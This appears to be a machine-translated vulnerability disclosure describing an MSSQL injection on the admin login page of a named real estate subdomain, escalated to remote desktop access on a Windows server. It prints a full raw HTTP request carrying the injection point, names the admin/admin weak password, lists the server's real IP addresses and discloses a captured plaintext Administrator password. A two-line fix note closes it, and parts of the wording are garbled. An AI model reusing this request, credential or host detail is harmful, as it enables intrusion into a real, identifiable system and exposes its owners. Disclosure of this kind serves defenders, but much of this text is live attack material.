MSSQL injection for a domain name in focus property (You have logged on to the Remote Desktop)

MSSQL injection for a domain name in focus property (You have logged on to the Remote Desktop)

MSSQL injection and sa for a domain name in focus real estate, allowing you to easily create an account to remotely log on to Windows.

MSSQL injection and sa on the background logon page of meijugou.focus.cn. You can run the following command:

POST /web_admin/login.aspx HTTP/1.1Host: meijugou.focus.cnProxy-Connection: keep-aliveContent-Length: 239Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://meijugou.focus.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://meijugou.focus.cn/web_admin/login.aspxAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,en;q=0.6Cookie: PHPSESSID=5ff020a410401150521fe179ae47c438; sohutag=8HsmeSc5NCwmcyc5NCwmYjc5NCwmYSc5NCwmZjc5NSwmZyc5NCwmbjc5NCwmaSc5NCwmdyc5NCwmaCc5NCwmYyc5NCwmZSc5NCwmbSc5NH0; IPLOC=CN1100; SUV=1506032025433118; __utma=1.790066425.1433334400.1433334400.1433334400.1; __utmb=1.1.10.1433334400; __utmc=1; __utmz=1.1433334400.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASP.NET_SessionId=b4y3aydjc5hoscxs0ofbechu__VIEWSTATE=%2FwEPDwULLTE3MDQ5NjIzMjhkZP1IBl1CCSDOuKtdTEUX%2B61JBUPK%2Bk4NgOP8xFBrmp8p&__EVENTVALIDATION=%2FwEWBAKzh8%2FiCAL3xJvhBALS9cL8AgKRvKPSBajfdDeFZc8S1AnpXdqmVZhyuWpMh%2FB9iDz6o%2Bb%2FYkjg&txt_UserName=test*&txt_Password=1&but_login=

 

Weak passwords admin/admin are used in the background.

It is assumed that the DNS Operation and Maintenance Error has not been deleted, and the domain name is actually resolved to another company server.
 

This machine has dual IP addresses, but no intranet IP addresses.

IPv4 address ............: 112.65.249.157 subnet mask ............: 255.255.255.128 IPv4 address ............: 114.80.94.246 subnet mask ............: 255.255.255.128 Default Gateway .............: 114.80.94.254

Capture the administrator password and find it has nothing to do with focus:

* User: Administrator* Domain: WIN-CT6249O7FLF* Password: 246@7x24.cn

 

Solution:

If a dns o & M error occurs, delete the DNS record.

If it is your own machine, solve the problem of SQL injection and weak password.